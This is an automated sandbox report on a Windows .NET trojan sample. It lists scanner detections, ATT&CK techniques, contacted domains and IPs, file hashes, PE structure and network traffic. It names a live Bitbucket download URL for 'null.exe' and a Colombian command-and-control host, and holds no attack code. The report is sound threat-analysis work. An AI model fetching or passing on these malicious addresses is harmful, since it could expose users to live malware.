Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	123 System Information Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
ozfqy8Ms6t.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.Heracles
ozfqy8Ms6t.exe	100%	Avira	HEUR/AGEN.1360822
ozfqy8Ms6t.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://bbuseruploads.s3.amazonaws	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s3-w.us-east-1.amazonaws.com	3.5.29.178	true	false	high
bitbucket.org	185.166.143.50	true	false	high
navegacionseguracol24vip.org	181.131.217.244	true	false	unknown
bbuseruploads.s3.amazonaws.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bitbucket.org/facturacioncol/fact/downloads/null.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://bbuseruploads.s3.amazonaws.com	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003126000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000002EA4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp	false		high
http://bitbucket.org	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.00000000030FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://web-security-reports.services.atlassian.com/csp-report/bb-website	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000311C000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dz8aopenkvv6s.cloudfront.net	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000311C000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp	false		high
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000311C000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp	false		high
https://bbuseruploads.s3.amazonaws	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003126000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.cookielaw.org/	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000311C000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aui-cdn.atlassian.com/	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000311C000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000311C000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000311C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://s3-w.us-east-1.amazonaws.com	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000313E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000313E000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.00000000030E4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://bbuseruploads.s3.amazonaws.com	ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000313E000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
181.131.217.244	navegacionseguracol24vip.org	Colombia		13489	EPMTelecomunicacionesSAESPCO	false
185.166.143.50	bitbucket.org	Germany		16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573896
Start date and time:	2024-12-12 17:33:23 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ozfqy8Ms6t.exe renamed because original name is a hash value
Original Sample Name:	9b5bda80417b3128dc2c378ddb0014f0afb2345ad5d33555e92e2023ef5c1515.exe
Detection:	MAL
Classification:	mal84.evad.winEXE@1/0@4/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 91% Number of executed functions: 137 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: ozfqy8Ms6t.exe

Simulations

Behavior and APIs

Time	Type	Description
11:34:16	API Interceptor	11446698x Sleep call for process: ozfqy8Ms6t.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
181.131.217.244	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse
	s0tuvMen1D.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	hCJ8gK9kNn.exe	Get hash	malicious	Unknown	Browse
	SYSnyI8qDu.exe	Get hash	malicious	Remcos	Browse
	QU4rXM7CiL.exe	Get hash	malicious	Remcos	Browse
	4wECQoBvYC.exe	Get hash	malicious	Remcos	Browse
	nlfb.exe	Get hash	malicious	Unknown	Browse
	nlfb.exe	Get hash	malicious	Unknown	Browse
	qtIh.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
185.166.143.50	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse
	https://feji.us/m266he	Get hash	malicious	Unknown	Browse
	lLNOwu1HG4.js	Get hash	malicious	RHADAMANTHYS	Browse
	iVH355vnza.vbs	Get hash	malicious	Unknown	Browse
	9QwZPBACyK.exe	Get hash	malicious	Unknown	Browse
	PQwHxAiBGt.exe	Get hash	malicious	RHADAMANTHYS	Browse
	jW3NEKvxH1.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	yG53aU3gGm.exe	Get hash	malicious	Unknown	Browse
	yG53aU3gGm.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
navegacionseguracol24vip.org	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	hCJ8gK9kNn.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
bitbucket.org	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	hCJ8gK9kNn.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	https://feji.us/m266he	Get hash	malicious	Unknown	Browse	185.166.143.50
	lLNOwu1HG4.js	Get hash	malicious	RHADAMANTHYS	Browse	185.166.143.50
	iVH355vnza.vbs	Get hash	malicious	Unknown	Browse	185.166.143.50
	9QwZPBACyK.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	PQwHxAiBGt.exe	Get hash	malicious	RHADAMANTHYS	Browse	185.166.143.50
	YWFMFVCSun.bat	Get hash	malicious	AsyncRAT, DcRat	Browse	185.166.143.48
	jW3NEKvxH1.exe	Get hash	malicious	Remcos, DBatLoader	Browse	185.166.143.50
s3-w.us-east-1.amazonaws.com	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	3.5.28.146
	financial_policy_December 10, 2024.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	54.231.205.1
	https://login.hr-internal.co/27553be9ed867726?l=50	Get hash	malicious	Unknown	Browse	3.5.28.204
	http://prntbl.concejomunicipaldechinu.gov.co	Get hash	malicious	Unknown	Browse	16.15.193.78
	https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exe	Get hash	malicious	Unknown	Browse	54.231.165.145
	https://auth.ball.com	Get hash	malicious	Unknown	Browse	16.182.101.169
	https://businessnotice.org/dhl/22450156620/tracking?u=84775-c0bf6be57168918ea5fe039631be6c3a772f4fac11292328fca4a210ba0e8890	Get hash	malicious	Unknown	Browse	52.217.98.132
	https://quiet-sun-5d9f.atmos4.workers.dev/login	Get hash	malicious	Unknown	Browse	3.5.23.166
	https://uhu145fc.s3.amazonaws.com/bf63.html?B3E2629E-DF5B-2F28-7322FD910FB23F54	Get hash	malicious	Phisher	Browse	54.231.225.9
	W-2Updated.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	54.231.134.177

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
EPMTelecomunicacionesSAESPCO	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	s0tuvMen1D.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	181.131.217.244
	hCJ8gK9kNn.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	SYSnyI8qDu.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	QU4rXM7CiL.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	ppc.elf	Get hash	malicious	Mirai	Browse	191.98.81.24
	x86.elf	Get hash	malicious	Mirai	Browse	190.29.49.250
	Josho.arm.elf	Get hash	malicious	Unknown	Browse	181.138.92.50
	Josho.m68k.elf	Get hash	malicious	Unknown	Browse	190.70.10.221
AMAZON-02US	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	hCJ8gK9kNn.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	file.exe	Get hash	malicious	Vidar	Browse	18.238.49.124
	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	45.112.123.126
	jew.arm.elf	Get hash	malicious	Unknown	Browse	52.30.223.81
	7299_output.vbs	Get hash	malicious	Unknown	Browse	3.78.28.71
	7166_output.vbs	Get hash	malicious	AsyncRAT	Browse	18.197.239.5
	phish_alert_sp2_2.0.0.0 (1).eml	Get hash	malicious	Unknown	Browse	52.219.193.160
	2.elf	Get hash	malicious	Unknown	Browse	54.126.45.88

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	hCJ8gK9kNn.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdf	Get hash	malicious	Unknown	Browse	185.166.143.50
	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	185.166.143.50
	http://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion	Get hash	malicious	Unknown	Browse	185.166.143.50
	questionable.ps1	Get hash	malicious	Unknown	Browse	185.166.143.50
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.166.143.50
	3jr0P5izLl.exe	Get hash	malicious	LummaC	Browse	185.166.143.50

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.936166093843013
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	ozfqy8Ms6t.exe
File size:	604'672 bytes
MD5:	7e230785cac6be6b780603a6c8b4ef32
SHA1:	55938fa77363817e062b11c246261d3486a0185b
SHA256:	9b5bda80417b3128dc2c378ddb0014f0afb2345ad5d33555e92e2023ef5c1515
SHA512:	66be4c5a125da507b72df4947d3b4542a7e682a86fe684313599e961ea673a844fb260186187fad8acf116cb8ad7f3a8b32f21005b6a799779fb3ea2e2348619
SSDEEP:	12288:YnJrN8G5KJoF/3zwFHMIeY2yCaTk8oVBwsJj1oVq:YJRLKaFfsFsIPVCatoNJjh
TLSH:	27D4220A53D58310DC915BBEC8E3902103FAB7962D77D7493A4863CE2EA3B959F44FA4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W................0..0...........N... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x494efe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xEED65780 [Sat Dec 22 14:21:52 2096 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x94eb0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x96000	0x560	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x98000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x92f04	0x93000	4183d2952222e13c57f472780e3fb343	False	0.9525536777210885	data	7.9439009479418665	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x96000	0x560	0x600	367b30715725451322ed4dc934b1c686	False	0.3990885416666667	data	3.922122838987164	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x98000	0xc	0x200	bf8265ed0522b1f8afaa8ebefb956ade	False	0.041015625	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x960a0	0x2d4	data			0.43232044198895025
RT_MANIFEST	0x96374	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 17:34:17.542150021 CET	49707	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:17.661930084 CET	30203	49707	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:17.662041903 CET	49707	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:17.687159061 CET	49707	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:17.806929111 CET	30203	49707	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:17.806994915 CET	49707	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:17.926965952 CET	30203	49707	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:19.163271904 CET	30203	49707	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:19.209753990 CET	49707	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:19.402945042 CET	30203	49707	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:19.406409025 CET	49707	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:19.526846886 CET	30203	49707	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:19.526943922 CET	49707	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:19.620001078 CET	49709	443	192.168.2.6	185.166.143.50
Dec 12, 2024 17:34:19.620037079 CET	443	49709	185.166.143.50	192.168.2.6
Dec 12, 2024 17:34:19.620304108 CET	49709	443	192.168.2.6	185.166.143.50
Dec 12, 2024 17:34:19.628467083 CET	49709	443	192.168.2.6	185.166.143.50
Dec 12, 2024 17:34:19.628483057 CET	443	49709	185.166.143.50	192.168.2.6
Dec 12, 2024 17:34:21.157061100 CET	443	49709	185.166.143.50	192.168.2.6
Dec 12, 2024 17:34:21.157191038 CET	49709	443	192.168.2.6	185.166.143.50
Dec 12, 2024 17:34:21.172595978 CET	49709	443	192.168.2.6	185.166.143.50
Dec 12, 2024 17:34:21.172641993 CET	443	49709	185.166.143.50	192.168.2.6
Dec 12, 2024 17:34:21.173410892 CET	443	49709	185.166.143.50	192.168.2.6
Dec 12, 2024 17:34:21.228199005 CET	49709	443	192.168.2.6	185.166.143.50
Dec 12, 2024 17:34:21.277095079 CET	49709	443	192.168.2.6	185.166.143.50
Dec 12, 2024 17:34:21.319330931 CET	443	49709	185.166.143.50	192.168.2.6
Dec 12, 2024 17:34:21.844619989 CET	443	49709	185.166.143.50	192.168.2.6
Dec 12, 2024 17:34:21.844677925 CET	443	49709	185.166.143.50	192.168.2.6
Dec 12, 2024 17:34:21.844695091 CET	49709	443	192.168.2.6	185.166.143.50
Dec 12, 2024 17:34:21.844719887 CET	443	49709	185.166.143.50	192.168.2.6
Dec 12, 2024 17:34:21.844739914 CET	49709	443	192.168.2.6	185.166.143.50
Dec 12, 2024 17:34:21.844866037 CET	443	49709	185.166.143.50	192.168.2.6
Dec 12, 2024 17:34:21.844919920 CET	49709	443	192.168.2.6	185.166.143.50
Dec 12, 2024 17:34:21.848268986 CET	49709	443	192.168.2.6	185.166.143.50
Dec 12, 2024 17:34:22.398436069 CET	49710	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:22.519735098 CET	30203	49710	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:22.519880056 CET	49710	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:22.522202969 CET	49710	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:22.642003059 CET	30203	49710	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:22.642052889 CET	49710	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:22.762387991 CET	30203	49710	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:24.076452017 CET	30203	49710	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:24.076529980 CET	49710	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:24.079758883 CET	49710	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:24.195147038 CET	49712	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:24.199947119 CET	30203	49710	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:24.315165997 CET	30203	49712	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:24.315365076 CET	49712	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:24.316113949 CET	49712	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:24.439351082 CET	30203	49712	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:24.439522982 CET	49712	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:24.559469938 CET	30203	49712	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:25.840445995 CET	30203	49712	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:25.840606928 CET	49712	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:25.840785027 CET	49712	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:25.945157051 CET	49718	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:25.961378098 CET	30203	49712	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:26.067344904 CET	30203	49718	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:26.067533970 CET	49718	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:26.068280935 CET	49718	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:26.188436985 CET	30203	49718	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:26.188498974 CET	49718	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:26.309613943 CET	30203	49718	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:27.487746954 CET	30203	49718	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:27.488073111 CET	49718	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:27.488395929 CET	49718	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:27.601433992 CET	49719	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:27.608334064 CET	30203	49718	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:27.722096920 CET	30203	49719	181.131.217.244	192.168.2.6
Dec 12, 2024 17:34:27.722240925 CET	49719	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:34:27.722888947 CET	49719	30203	192.168.2.6	181.131.217.244
